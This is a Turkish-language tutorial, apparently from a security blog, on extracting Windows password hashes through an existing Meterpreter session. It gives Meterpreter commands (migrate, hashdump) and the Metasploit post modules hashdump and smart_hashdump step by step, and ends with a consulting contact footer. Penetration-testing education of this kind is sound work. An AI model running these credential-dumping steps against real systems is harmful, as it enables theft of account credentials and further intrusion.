Yazıda incelenecek olan bilgisayar 64 bitlik Windows 7 işletim sistemidir. Bu bilgisayarda elde edilen Meterpreter bağlantısı aşağıda belirtildiği gibidir. Meterpreter bağlantısının 32 bitlik rundll32.exe adlı proses üzerinden SYSTEM haklarıyla elde edildiği görülmektedir.
ps -s
getuid
getpid
Her bir başlıkta incelenecek olan tekniğin çıktısı bir biri ile bağımsız olduğu, ardışık bir şekilde listelenmediği göz önünce bulundurulmalıdır.
Meterpreter “hashdump” Komutu
Proses 32 bit ve işletim sistemi 64 bit olduğu için, Meterpreter “hashdump” komutunun mevcut durumda çalışmadığı görülmektedir. Bunun yanında, 64 bitlik SYSTEM yetkileri ile çalışan bir prosese sıçrandığında ise Meterpreter “hashdump” komutu ile parola özetlerinin elde edilebildiği görülmektedir.
hashdump
migrate 1924
hashdump
MSF “hashdump” Post Modülü
MSF “hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “hashdump” post modülünün seçenekleri aşağıdaki gibidir.
background
search hashdump type:post platform:windows
use post/windows/gather/hashdump
show options
MSF “hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.
set SESSION 1
show options
run
MSF “hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.
run hashdump
MSF “smart_hashdump” Post Modülü
MSF “smart_hashdump” post modülü ile parola özetlerini elde edebilmek için MSF komut satırına erişim sağlanmalıdır. MSF “smart_hashdump” post modülünün seçenekleri aşağıdaki gibidir.
background
search hashdump type:post platform:windows
use post/windows/gather/smart_hashdump
show options
MSF “smart_hashdump” post modülünün çıktısı aşağıdaki gibi elde edilebilir.
set SESSION 1
show options
run
MSF “smart_hashdump” post modülü, Meterpreter komut satırında iken de çağırılabilir.
run post/windows/gather/smart_hashdump
Kurumsal Danışmanlık için size nasıl ulaşabiliriz ?
Saygılarımızla…
Biraz geç oldu ama yine de iletmek istedim. Mail adresimiz üzerinden bizimle iletişime geçebilirsiniz.
info@siberportal.org
İyi günler, iyi çalışmalar